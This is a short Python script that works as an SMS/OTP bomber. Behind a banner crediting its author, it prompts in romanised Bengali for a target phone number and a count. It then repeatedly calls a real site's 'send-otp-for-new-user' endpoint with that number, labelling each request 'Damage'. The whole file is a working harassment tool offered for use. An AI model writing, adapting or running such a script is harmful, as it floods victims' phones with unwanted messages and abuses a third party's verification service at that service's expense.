import requests

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _____ _   _ _ ____                 
 |_   _| | | (_) ___|                
   | | | |_| | \___ \                
   | | |  _  | |___) |               
   |_| |_| |_|_|____/                
  ____        ____ _____    __  __   
 / ___| _   _/ ___|_   _|__|  \/  |  
 \___ \| | | \___ \ | |/ _ \ |\/| |  
  ___) | |_| |___) || |  __/ |  | |  
 |____/ \__, |____/ |_|\___|_|  |_|  
   ____ |___/         _____          
  / ___|_ __ ___  __ |_   _|__  _ __ 
 | |   | '__/ _ \/ _` || |/ _ \| '__|
 | |___| | |  __/ (_| || | (_) | |   
  \____|_|  \___|\__,_||_|\___/|_|   
  ____                               
 | __ ) _   _                        
 |  _ \| | | |                       
 | |_) | |_| |                       
 |____/ \__, |                       
        |___/_ _ _ _____             
   __ _ _ __(_|_|_)  ___|            
  / _` | '__| | | | |_               
 | (_| | |  | | | |  _|              
  \__,_|_|  |_|_|_|_|                
                                     """+end)

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

number  = str(input("[>] apNar aTTack NumBer DiN: "))

amount = int(input("[>] apNar aTTack ar PoriMaN LikHuN: "))


url = "https://poshorabd.com/send-otp-for-new-user?phone_num="+number

for i in range(amount):

	resp = requests.get(url)

	print(str (i+1)+" Damage \n")


